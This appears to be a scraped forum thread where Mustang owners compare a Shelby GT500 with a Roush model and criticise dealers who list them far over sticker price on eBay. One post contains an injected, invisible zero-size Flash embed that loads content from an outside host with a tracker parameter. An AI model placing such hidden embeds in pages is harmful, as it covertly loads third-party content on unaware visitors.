Which of these Stangs would you rather have?

• Sponsors (?)

The GT500, the powertrain is much stronger and the suspension was improved a lot for 2010. The Roush body kit improved the looks on the 05-09 cars a lot but the 2010 kit doesn't really improve the GT all that much. Obviously there aren't any details available for the 5.0 engine for the GT but I would like to see what Roush will do with that; which could make it a tougher decision.

I wouldn't pay that much over window for either. When the GT500 first came out guys were selling them for almost $60K over window. $59K minimum bid for a $40K+ car ? No thanks. I don't even like the new body, yet. I'm hoping it will grow on me, but it hasn't yet.

LAst I checked the sticker price on a GT-500 was not 60K, seems like the Roush is closer to sticker....tell you what I'ld do take eGay and click the little "x" close the window and roam around your local dealers you'ld be surprised what an in person visit, cash for a deposit and a motivated salesman will do as far as pricing.

LAst I checked the sticker price on a GT-500 was not 60K, seems like the Roush is closer to sticker....tell you what I'ld do take eGay and click the little "x" close the window and roam around your local dealers you'ld be surprised what an in person visit, cash for a deposit and a motivated salesman will do as far as pricing.

GT500 base price is $48K-ish. Anybody who pays $65K for one deserves the financial beating he'll get. You see them used with just a few miles on them for mid to low $30's all over.

For the money GT500 edges ahead (but not by much for my standards).

However once the 5.0 comes in I'd definitely go with a 5.0L powered 427R.

I just can't justify the Shelby's engine for the weight it puts on the car at least for the type of driving I do.

The GT 500. I wish I could afford it.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

+1 Power is better, and I like the looks. It also rolls off the tounge better...

Neither!

Why?

Cause any dealership that hasn't met a $59,995 (GT-500) or $49,995 (Roush) reserve for either of these vehicles (msrp sticker on the GT-500 reads $49,995 if you zoom in) won't get my business or respect. Come on, you've got to be kidding me, in times like these your trying to sell a vehicle some $10,000 or more over msrp. Dissappointing...regardless even if it considered a premium vehicle or not.

Both of them will probably sit on the showroom floor for two years or more just like the '08 KR thats listed at $85K up the street from me.

Ford Execs should do something about this...especially if your trying to rip somebody off by selling them on EBay.

I agree with VthStang - neither.

I'll take one of the identical cars listed on ebay for $10k less than those!

2 posts with three links to the same Salt Lake City dealership with the same salesman as the contact... smells like someone is trying to advertise for the dealership at which they work!

Neither!

Why?

Cause any dealership that hasn't met a $59,995 (GT-500) or $49,995 (Roush) reserve for either of these vehicles (msrp sticker on the GT-500 reads $49,995 if you zoom in) won't get my business or respect. Come on, you've got to be kidding me, in times like these your trying to sell a vehicle some $10,000 or more over msrp. Dissappointing...regardless even if it considered a premium vehicle or not.

Both of them will probably sit on the showroom floor for two years or more just like the '08 KR thats listed at $85K up the street from me.

Ford Execs should do something about this...especially if your trying to rip somebody off by selling them on EBay.

Ford can't do much, Ford sells their cars to a dealership. The dealership in turn can ask whatever amount they choose for a car. The only thing that's required is the Moroni sticker be in the window of a new car.

This was pretty common practice a few years ago. Some dealers still are trying to capitalize on greed. People would buy the rights to a car coming into a dealership for some paltry amount of money, then pre-sell the rights to that car when it came in. The dealerships caught on to this and started jacking up the prices themselves. But the world has changed in the past couple years. The only thing these dealerships are earning now is a reputation of being shysters.

It's easy to ensure these guys don't get your hard earned money, don't buy their products. The internet is going to change alot of how we buy our cars and dealerships that figure out being honest and providing a value to us consumers will stay in business.

I know chevy dealers are screwing Camaro buyers. I thought Ford dealers had ended this crap with markups on Mustangs. There are plenty out there for less than sticker. Just look and you will find them. I didn't catch the number of listings for the same dealer and salesperson.
Interesting.
I have never and will never pay more than sticker for a car. Actually I don't think I have ever paid sticker. There is no reason to do so.
Ford dealers will eventually quit doing this if we don't buy.